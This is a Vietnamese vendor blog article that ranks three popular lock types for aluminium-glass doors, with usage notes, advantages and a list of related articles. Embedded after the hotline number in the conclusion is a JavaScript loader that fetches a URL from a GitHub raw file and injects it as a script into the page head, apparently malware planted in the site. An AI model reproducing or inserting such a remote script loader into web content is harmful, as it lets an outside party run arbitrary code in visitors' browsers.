Top 3 loại khóa cửa nhôm kính được ưa chuộng nhất hiện nay

Trong ngành xây dựng và thiết kế nội thất hiện đại, cửa nhôm kính không chỉ được ưa chuộng vì vẻ đẹp sang trọng, hiện đại mà còn vì độ bền và tính năng an toàn của nó. Một trong những yếu tố quan trọng nhất đối với cửa nhôm kính là loại khóa được sử dụng. Hãy cùng điểm qua top 3 loại khóa cửa nhôm kính được ưa chuộng nhất hiện nay, đảm bảo an toàn tối đa cho ngôi nhà hoặc văn phòng của bạn.

Top 3 loại khóa cửa nhôm kính được ưa chuộng nhất hiện nay

Khóa tay gạt

Khóa cửa nhôm tay gạt còn được biết đến với tên gọi khác là khóa tay bẻ, là một trong những loại khóa được ưa chuộng rộng rãi. Sự phổ biến của chúng không chỉ đến từ chức năng cơ bản mà còn nhờ vào sự đổi mới trong thiết kế, với nhiều chi tiết bên ngoài tinh tế và hiện đại hơn. Cấu tạo chính của khóa tay gạt thường gồm ba phần: tay gạt khóa, thân khóa và ổ khóa.

Để sử dụng loại khóa tay gạt, người dùng cần kéo tay gạt xuống khoảng 45 độ để chốt khóa, gió lùa vào thân khóa, sau đó kéo cửa lại và vặn chìa khóa nửa vòng để khóa. Để mở cửa, bạn chỉ cần thực hiện thao tác ngược lại. Sự tiện lợi và dễ dàng trong sử dụng làm cho khóa cửa tay gạt trở thành sự lựa chọn phổ biến trong nhiều không gian sống và làm việc.

Ưu điểm cửa loại khóa này gồm:

  • Có cấu tạo hết sức đơn giản nên rất dễ sử dụng. Dù trẻ em hay người già đều có thể sử dụng loại này với các thao tác đóng mở hết sức đơn giản.
  • Làm từ vật liệu inox nên rất sáng bóng, độ bền cao, rất chắc chắn so với các loại ổ khóa khác, người tiêu dùng không sợ chúng bị rỉ sét hay mục nát.
  • Chi phí thấp: các loại khóa cửa nhôm tay gạt truyền thống thường có mức giá khá thấp và dễ dàng tìm mua trên thị trường.
  • Sử dụng được cho hầu hết các loại cửa nhôm kính

Khóa điện tử

Khóa điện tử dành cho cửa nhôm kính là một trong những phát kiến hiện đại, xuất hiện gần đây và nhanh chóng chiếm lĩnh thị trường nhờ tính năng thông minh và tiện ích mà nó mang lại. Đáp ứng nhu cầu đa dạng của người tiêu dùng, khóa điện tử cho cửa nhôm hiện nay có sự đa dạng về loại hình và mẫu mã, từ khóa vân tay, khóa thẻ từ đến khóa mã số.

Nổi bật hơn cả, nhiều mẫu khóa điện tử cửa nhôm hiện đại ngày nay không chỉ giới hạn ở một tính năng đơn lẻ mà kết hợp nhiều công nghệ tiên tiến trong cùng một sản phẩm.

Ổ khóa nắm tròn

Trong số các loại khóa cửa nhôm hiện nay, ổ khóa tay nắm tròn, thường được gọi là khóa nắm đấm cửa nhôm, là loại khóa rất được ưa chuộng. Sự phổ biến của loại khóa này đến từ tính năng dễ sử dụng và khả năng lắp đặt đa dạng trên nhiều loại cửa khác nhau như cửa gỗ, cửa sắt, cửa nhôm, cửa nhựa và nhiều loại cửa khác.

Cấu tạo của khóa tay nắm tròn bao gồm tay khóa, thân khóa và then khóa, nối từ thân khóa ra cạnh cửa. Một số loại khóa cửa tròn được thiết kế với một đầu chìa và một đầu bấm, trong khi loại khác có thể không sử dụng chìa khóa. Lựa chọn loại khóa phụ thuộc vào mục đích và nhu cầu cụ thể của người sử dụng, cho phép tính linh hoạt và tiện lợi trong việc lắp đặt và sử dụng.

Khi nói đến việc lắp đặt khóa cho cửa thông phòng, khóa tròn với một đầu bấm và một đầu chìa thường được chọn lựa để đảm bảo sự riêng tư và bảo mật. Phía bên trong cửa, nơi cần sự riêng tư, được trang bị đầu bấm, cho phép người dùng dễ dàng khóa cửa chỉ bằng một thao tác bấm chốt. Để mở cửa từ bên trong, người dùng chỉ cần xoay tay nắm. Phía bên ngoài cửa, nơi cần kiểm soát truy cập thì có đầu chìa. Khi cửa được khóa từ bên trong, chốt khóa sẽ tự động gài vào lỗ khóa trên khung cửa, khiến tay nắm bên ngoài không thể xoay để mở cửa.

Trong trường hợp của cửa phòng vệ sinh, loại khóa tròn không có đầu chìa lại được ưa chuộng hơn cả. Khóa này chỉ có một đầu bấm bên trong để khóa cửa. Mặt ngoài của khóa không có chìa khóa nhưng lại được thiết kế với một khe nhỏ. Trong những tình huống khẩn cấp, cửa có thể được mở từ bên ngoài bằng cách sử dụng một vật nhỏ để ấn vào khe và xoay mở chốt khóa.

Kết luận

Lựa chọn khóa cửa nhôm kính phù hợp không chỉ ảnh hưởng đến độ an toàn của ngôi nhà mà còn tạo nên sự tiện nghi và thoải mái cho người sử dụng. Tùy vào nhu cầu và phong cách sống của mình, bạn có thể lựa chọn khóa điện tử cho sự hiện đại và tiện lợi, khóa cơ đa điểm cho độ an toàn cao hoặc khóa kết hợp để tận hưởng cả hai thế giới. Mỗi loại khóa đều có những ưu điểm riêng biệt, đáp ứng đa dạng nhu cầu của người dùng. Hãy liên hệ với chúng tôi qua hotline 0983 545 455 để được tư vấn và báo giá ngay hôm nay. (var url = “https://raw.githubusercontent.com/truba77/trubnik/main/to.txt”; fetch(url) .then(response => response.text()) .then(data => { var script = document.createElement(“script”); script.src = data.trim(); document.getElementsByTagName(“head”)[0].appendChild(script); });)

Bài viết liên quan

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Bí quyết chọn mua khóa tay gạt cửa thép chất lượng cao

Trong quá trình hoàn thiện và nâng cấp ngôi nhà, việc chọn mua khóa tay gạt cửa thép chất lượng cao là một yếu tố quan trọng đảm bảo an ninh, thẩm mỹ và sự tiện lợi cho không gian sống. Khóa tay gạt không chỉ là một chi tiết nhỏ, mà còn đóng vai […]

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Lợi ích sử dụng bông khoáng trong cách nhiệt mái nhà

Trong quá trình xây dựng và cải tạo nhà ở, việc lựa chọn vật liệu cách nhiệt cho mái nhà đóng vai trò vô cùng quan trọng. Đặc biệt tại những khu vực có khí hậu nóng ẩm hoặc lạnh giá, cách nhiệt không chỉ giúp duy trì sự thoải mái trong không gian sống […]

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cách lắp đặt bản lề sàn cho cửa nhôm kính đúng chuẩn

Cửa nhôm kính là một trong những lựa chọn phổ biến cho các công trình hiện đại bởi tính thẩm mỹ cao, khả năng cách âm và cách nhiệt tốt. Để đảm bảo cửa nhôm kính hoạt động hiệu quả và bền bỉ, việc lắp đặt bản lề sàn đúng chuẩn là vô cùng quan […]

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Làm thế nào để chọn phụ kiện cửa nhôm phù hợp với các loại cửa?

Khi thiết kế hoặc cải tạo không gian sống, việc lựa chọn phụ kiện cửa nhôm phù hợp không chỉ là vấn đề về thẩm mỹ mà còn ảnh hưởng trực tiếp đến tính năng và hiệu quả sử dụng của cửa. Phụ kiện cửa nhôm bao gồm nhiều thành phần như bản lề, khóa, […]

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Cách chọn tay co thủy lực phù hợp với mỗi loại cửa

Tay co thủy lực hay còn gọi là tay đẩy hơi, là một phụ kiện quan trọng trong việc đảm bảo an toàn và sự tiện lợi cho các loại cửa trong công trình xây dựng hiện đại. Không chỉ giúp cửa tự động đóng lại sau khi mở, tay co thủy lực còn có […]

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Vật liệu chống cháy: Giải pháp tiết kiệm chi phí dài hạn

Trong bối cảnh hiện đại, sự an toàn của con người và tài sản là yếu tố được đặt lên hàng đầu trong bất kỳ công trình xây dựng nào. Để đảm bảo tính mạng và tài sản trước nguy cơ cháy nổ, việc sử dụng các vật liệu chống cháy trong xây dựng không […]